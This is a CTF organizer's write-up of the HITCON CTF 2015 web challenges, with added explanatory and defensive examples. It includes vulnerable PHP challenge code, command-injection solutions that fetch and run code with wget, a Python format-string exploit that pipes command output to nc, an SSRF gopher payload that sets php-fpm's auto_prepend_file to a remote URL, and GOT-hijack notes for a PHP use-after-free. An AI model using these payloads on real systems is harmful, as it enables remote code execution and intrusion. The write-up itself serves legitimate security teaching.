orange.tw, 2015/10/20

[email protected] Blog: blog.orange.tw

P.S. The related code is posted on GitHub. If you are interested, take a look at the code and try to solve the challenges yourself.

Written after HITCON CTF 2015 Quals, as one of the organizing team. I have to say the difficulty was not exactly low, but as a DEFCON seed event I think it lived up to its name! 🙂

This time I was responsible for all of the Web challenges, so I indulged myself a little and put some of my recent research into the problems XD. The main goal was that participants would find the problems hard while solving them, but afterwards think "oh, so that's it" or "you can play it like that too". That was the point of my challenges XD

0x01 100 BabyFirst (33 teams solved)


    <?php
    highlight_file(__FILE__);
    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
    if ( ! file_exists($dir) )
        mkdir($dir);
    chdir($dir);
    $args = $_GET['args'];
    for ( $i=0; $i<count($args); $i++ ){
        if ( ! preg_match('/^\w+$/', $args[$i]) )
            exit();
    }
    exec("/bin/orange " . implode(" ", $args));
    ?>

Gist.github.com/orangetw/cb…

The easiest Web challenge: pure code review, only 15 lines of code, and it was first solved two hours after the contest started.

The trick is that without the multiline modifier, `$` in preg_match still matches just before a trailing newline, so an argument ending in \n passes the check. Every team had a different idea from there, so there are many ways to do it!
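As an added example (not part of the original challenge code), here is the same check in Python, where `$` has the same before-trailing-newline behaviour as PCRE: the weak pattern beside a hardened one, and a helper that lists which constructed inputs the weak check lets through. The function and sample names are this example's own.

```python
import re

# Weak: '$' also matches just before a single trailing "\n", so "payload\n"
# passes even though the intent was "letters, digits and underscore only".
WEAK = re.compile(r'^\w+$')

# Hardened: Python's '\Z' is the absolute end of the string (PCRE spelling: '\z',
# or keep '$' and add the D "dollar end only" modifier).
STRICT = re.compile(r'^\w+\Z')


def weak_check(arg):
    return WEAK.match(arg) is not None


def strict_check(arg):
    return STRICT.match(arg) is not None


def slipped_through(args):
    """Return the arguments accepted by the weak check but rejected by the strict one."""
    return [a for a in args if weak_check(a) and not strict_check(a)]


# Constructed sample inputs: one clean token, one with a trailing newline,
# one with a space, one with two newlines (even '$' rejects that), one clean.
SAMPLES = ["orange", "payload\n", "a b", "x\n\n", "tar"]

if __name__ == "__main__":
    print(slipped_through(SAMPLES))   # ['payload\n']
```

The durable fix is not a better regex but not building a shell string from user input at all; if the arguments really must reach a command, pass them as an argument list rather than through string concatenation.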

My own intended solution is:

    mkdir orange
    cd orange
    wget HEXED_IP
    tar cvf payload orange
    php payload

which lets me execute any code I want.

From the logs you can see the other teams did things like

    busybox ftpget ...

or

    twistd telnet ...

or

    wget HEX_IP

This one serves a 302 redirect to the FTP protocol, which is the most amazing XD. I had checked the wget source and concluded that the generated index.html could not be controlled; it turns out that over FTP it can be.

Overall I got to see all sorts of ways of working within a restricted command line, and as the challenge author I learned many new tricks myself XD. I think this was the most successful challenge: simple, fun and interesting!

0x02 200 nanana (18 teams solved)


Gist.github.com/orangetw/49…

    xxd -r -p nanana.xxd > nanana

Named as a Web challenge, this is actually a Pwn problem. Only the binary is provided, without libc, so you have to solve it with no library at all! It is a format string bug but with no output (sprintf); the goal is to overwrite do_job's GOT entry with system's PLT address.

The only thing to note is the leak. The stack protector's "*** stack smashing detected ***: ... terminated" message prints the program name through the argv pointer, so overwriting that pointer turns the abort message into an arbitrary address read, which is used to leak the password. But this is 64-bit and the request cannot carry any NULL bytes. The trick is the order in which username, password and job are copied: the NULL that terminates the copy supplies the high bytes, so by overwriting only the low three bytes of the pointer (0x601090) and leaving the remaining five bytes as NULL you get an arbitrary address read.

For the details of the exploit, see:

    #!/usr/bin/env python2
    import requests
    from urllib import urlencode
    from struct import pack, unpack

    URL = 'http://54.92.88.102/cgi-bin/nanana'

    def leak(address):
        # Only the low three bytes of the pointer are sent; the terminating
        # NULLs of the copy fill the remaining five bytes of the 64-bit pointer.
        address = pack('I', address)
        address = address.strip('\x00')
        payload = {
            'username': 'A'*349,
            'password': 'B'*380,
            'job': 'C'*392 + address
        }
        r = requests.get(URL + '?' + urlencode(payload))
        # The stack-protector abort message echoes whatever the argv pointer now points at
        l = r.headers['*** stack smashing detected ***']
        l = l.strip(' terminated')
        l = l.ljust(8, '\x00')
        try:
            return unpack('Q', l)
        except:
            return l

    def e(cmd, pwd):
        # Format-string write: redirect do_job's GOT entry to system's PLT stub
        payload = {
            'username': cmd,
            'password': pwd,
            'job': '\x48\x10\x60',
            'action': '%198x%15$hhn'
        }
        print urlencode(payload)
        r = requests.get(URL + '?' + urlencode(payload))

    if __name__ == '__main__':
        pwd = leak(0x601090)
        print 'pwd @ %s' % pwd
        e('id | nc 127.0.0.1 12345', pwd=pwd)

Gist.github.com/orangetw/58…

0x03 300 Giraffe's Coffee (16 teams solved)


Gist.github.com/orangetw/4a…

This one is also a code review challenge.

The core concept is predicting PHP's PRNG. Since it is hard for a computer to be truly "random", most random numbers today come from a PRNG, and in PHP the PRNG is implemented with the Mersenne Twister algorithm.

If no seed is given, php_mt_rand seeds itself from the current PID and time with some arithmetic. The seed is only 32 bits long, so it can be brute-forced.

Some people reached for off-the-shelf tools and found they failed. The PRNG cannot be predicted with certainty because under Apache PHP is preforked: every request is served by a process that was already forked earlier, so you cannot tell whether the PRNG output you see is the first one after seeding, and the process handling each connection may not even be the same, which makes the state still harder to predict (the existing tools only compute the first output after the seed for comparison).

This can be solved by using keep-alive to make sure you stay connected to the same process, and then extending the original seed crack to compare more than the first state (624 states in total).
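As an added example (not from the original post), the following Python shows why a 32-bit, time-derived Mersenne Twister seed is recoverable even when the outputs you observe are not the first ones after seeding, which is the preforked-worker situation described above. It implements the reference MT19937 seeded the way C's init_genrand does; PHP 5's mt_rand uses a slightly different twist and shifts its output right by one bit, so the seeding formula, PID and timestamp below are constructed for illustration and are not PHP's real ones. The class and function names are this example's own.

```python
N, M = 624, 397


class MT19937:
    """Reference Mersenne Twister, seeded like C's init_genrand(seed)."""

    def __init__(self, seed):
        self.mt = [0] * N
        self.mt[0] = seed & 0xffffffff
        for i in range(1, N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xffffffff
        self.index = N

    def _twist(self):
        for i in range(N):
            y = (self.mt[i] & 0x80000000) | (self.mt[(i + 1) % N] & 0x7fffffff)
            v = self.mt[(i + M) % N] ^ (y >> 1)
            if y & 1:
                v ^= 0x9908b0df
            self.mt[i] = v
        self.index = 0

    def next_u32(self):
        if self.index >= N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9d2c5680
        y ^= (y << 15) & 0xefc60000
        y ^= y >> 18
        return y & 0xffffffff


def recover_seed(observed, candidate_seeds, max_offset):
    """Return (seed, offset) if MT19937(seed) emits `observed` starting at output
    index `offset` (0..max_offset), else None. Searching offsets > 0 is what copes
    with a worker that has already served other requests since it was seeded."""
    window = len(observed)
    for seed in candidate_seeds:
        rng = MT19937(seed)
        stream = [rng.next_u32() for _ in range(max_offset + window)]
        for off in range(max_offset + 1):
            if stream[off:off + window] == observed:
                return seed, off
    return None


def demo():
    # Constructed seed mixed from a timestamp and a PID, standing in for
    # "some arithmetic on time and PID"; this is not PHP's real formula.
    timestamp, pid = 1445299200, 1337
    real_seed = (timestamp ^ (pid << 16)) & 0xffffffff
    rng = MT19937(real_seed)
    for _ in range(3):                       # earlier requests already drew numbers
        rng.next_u32()
    observed = [rng.next_u32() for _ in range(3)]   # the outputs an observer sees
    # Only a narrow band around the guessed seed is scanned here to keep the demo
    # fast; the whole 32-bit space is still only about 4e9 candidates.
    candidates = range(real_seed - 250, real_seed + 251)
    return recover_seed(observed, candidates, max_offset=10), real_seed


if __name__ == "__main__":
    recovered, real_seed = demo()
    print(recovered, real_seed)   # (real_seed, 3) real_seed
```

The lesson for application code is that mt_rand output must never be treated as a secret: PHP 7's random_int() and random_bytes() draw from the system CSPRNG and have no recoverable seed to attack.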

0x04 400 Lalala (2 teams solved)


The service lets users upload images or provide a URL for the server to fetch and upload on their behalf. The core concepts are bypassing the SSRF filter with a 302 redirect, and then using the SSRF to speak the FastCGI protocol to the local php-fpm via Gopher for remote code execution.

A 302 can be used to turn the image fetch into SSRF (many people overlook how useful 302 is when studying SSRF).

Files can be read through the SSRF (Location: file://localhost/etc/passwd).

The server architecture is Nginx + php-fpm, with php-fpm's FastCGI listening on a TCP port on the same machine.

In the real world, whenever you find a PHP FastCGI port that can be reached from outside, you can get a shell; so here we use Gopher to construct FastCGI protocol traffic to the local port 9001, which gives arbitrary code execution.

    Location: gopher://127.0.0.1:9001/x%01%01i%13%00%08%00%00%00%01%00%00%00%00%00%00%01%04i%13%00%8B%00%00%0E%03REQUEST_METHODGET%0F%0FSCRIPT_FILENAME/_www/index.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04i%13%00%00%00%00%01%05i%13%00%00%00%00

(PHP_ADMIN_VALUE sets allow_url_include to On, and PHP_VALUE adds an auto_prepend_file pointing at your own site)
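To see exactly what that redirect asks php-fpm to do, here is an added example (not from the original post) that decodes the gopher:// payload quoted above into its FastCGI records and flags the per-request ini overrides in it, which is the kind of decoding an analyst wants when such a Location header turns up in a proxy or egress log. The URL string is the payload from above; the record-type table follows the FastCGI specification, and the helper names are this example's own.

```python
from urllib.parse import unquote_to_bytes

FCGI_TYPES = {1: "BEGIN_REQUEST", 2: "ABORT_REQUEST", 3: "END_REQUEST",
              4: "PARAMS", 5: "STDIN", 6: "STDOUT", 7: "STDERR", 8: "DATA",
              9: "GET_VALUES", 10: "GET_VALUES_RESULT"}
FCGI_ROLES = {1: "RESPONDER", 2: "AUTHORIZER", 3: "FILTER"}

# The challenge payload quoted above, as one string.
PAYLOAD_URL = ("gopher://127.0.0.1:9001/x%01%01i%13%00%08%00%00%00%01%00%00%00%00"
               "%00%00%01%04i%13%00%8B%00%00%0E%03REQUEST_METHODGET%0F%0F"
               "SCRIPT_FILENAME/_www/index.php%0F%16PHP_ADMIN_VALUEallow_url_include"
               "%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x"
               "%01%04i%13%00%00%00%00%01%05i%13%00%00%00%00")


def gopher_wire_bytes(url):
    """Bytes a gopher client writes to the socket: the selector after the
    one-character item type (the leading 'x' here is never sent)."""
    selector = url.split("/", 3)[3]
    return unquote_to_bytes(selector[1:])


def _read_len(buf, i):
    # FastCGI name/value lengths: 1 byte, or 4 bytes with the high bit set
    if buf[i] & 0x80:
        return int.from_bytes(buf[i:i + 4], "big") & 0x7fffffff, i + 4
    return buf[i], i + 1


def parse_params(content):
    params, i = {}, 0
    while i < len(content):
        nlen, i = _read_len(content, i)
        vlen, i = _read_len(content, i)
        name = content[i:i + nlen].decode("latin-1")
        i += nlen
        value = content[i:i + vlen].decode("latin-1")
        i += vlen
        params[name] = value
    return params


def parse_fcgi(data):
    """Walk 8-byte record headers: version, type, requestId, contentLength, padding."""
    records, off = [], 0
    while off + 8 <= len(data):
        version, rtype = data[off], data[off + 1]
        req_id = int.from_bytes(data[off + 2:off + 4], "big")
        clen = int.from_bytes(data[off + 4:off + 6], "big")
        plen = data[off + 6]
        content = data[off + 8:off + 8 + clen]
        off += 8 + clen + plen
        rec = {"version": version, "type": FCGI_TYPES.get(rtype, rtype),
               "request_id": req_id, "length": clen}
        if rtype == 1 and clen >= 8:
            rec["role"] = FCGI_ROLES.get(int.from_bytes(content[:2], "big"))
        elif rtype == 4 and clen:
            rec["params"] = parse_params(content)
        records.append(rec)
    return records


INI_OVERRIDE_KEYS = ("PHP_VALUE", "PHP_ADMIN_VALUE")


def ini_overrides(records):
    """Detection hook: params that rewrite php.ini settings for this one request.
    A legitimate web server in front of php-fpm normally never sends these."""
    found = []
    for rec in records:
        for key, value in rec.get("params", {}).items():
            if key in INI_OVERRIDE_KEYS:
                found.append((key, value))
    return found


def decode_payload(url=PAYLOAD_URL):
    return parse_fcgi(gopher_wire_bytes(url))


if __name__ == "__main__":
    for rec in decode_payload():
        print(rec)
    print(ini_overrides(decode_payload()))
```

Decoded, the payload is a BEGIN_REQUEST (role RESPONDER), one PARAMS record naming /_www/index.php and carrying the two ini overrides, then the empty PARAMS and STDIN records that end the request. The mitigations follow directly: bind php-fpm to a unix socket or firewall the port from everything except the web server, and when the application fetches user-supplied URLs with curl, restrict CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS to http/https so a redirect cannot switch to gopher or file.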

Another interesting aspect of this problem: if you have ever implemented SSRF with Gopher, you will have found that Java's gopher handler only accepts bytes 0x00-0x7f, while libcurl's gopher handler only accepts 0x01-0xFF.

The challenge used PHP's curl_exec, hence libcurl, which could not send NULL bytes, yet a FastCGI request cannot be constructed without NULL bytes. So I went and studied the libcurl source and submitted a commit (NULL byte support in gopher) XD

Github.com/bagder/curl…

libcurl/curl can now send NULL bytes over gopher XD

0x05 500 Use-after-flee (1 team solved)


When doing penetration tests you will often run into open_basedir and disable_functions preventing you from reaching other sites on the same shared host.

PHP has had many memory-corruption bugs throughout its history, and this challenge is one of them.

phpcodz only provides a PoC:

Github.com/80vul/phpco…

Using the use-after-free to get around those restrictions sounds simple, but there are many protections to deal with on a modern operating system:

  1. DEP
  2. FULL ASLR
  3. PIE (Apache default open)
  4. FULL RELRO (Apache default on)
  5. The environment was Apache + mod_php, with PHP loaded into Apache as a library, which raises the difficulty compared with exploiting the plain CLI (that would have been easy), for example having to deal with parsing the ELF yourself XD

But PPP, the strongest team, was the only one to solve it, just one and a half hours before the end of the contest! It is a little bit of a pity, though: because the contest ran on EC2 Ubuntu 14.04 64-bit, they took the libc offsets straight from the other Pwn problems instead of finding them through STRTAB, SYMTAB and JMPREL 🙂

Ricky's writeup from PPP:

Github.com/pwning/publ…

Ricky's approach is to change the handler in the zval structure to the address of system, declare the zval's type as OBJECT and set its refcount to 0.

    struct _zval_struct {
      zvalue_value value;
      zend_uint refcount__gc;
      zend_uchar type;
      zend_uchar is_ref__gc;
    };

When the engine finds a refcount of 0 during processing it destructs the zval automatically and passes the zval itself as the argument to the handler. Only 8 bytes of command are usable (which is why Ricky used sh /*/a); on 32-bit the limit drops to 4 bytes and it becomes almost impossible to exploit XD

A more elegant solution would be GOT hijacking: temporarily point fopen's GOT entry at system, call fopen, and then you can make it do whatever you want.

    write($open_got, $system_address);
    fopen("| $cmd", "r");

So go ahead and try to exploit it, and find a way to make it perfect! 😛

There are so many tricks and problems to solve in the world of Web Security that I am proud to be a Web dog 🙂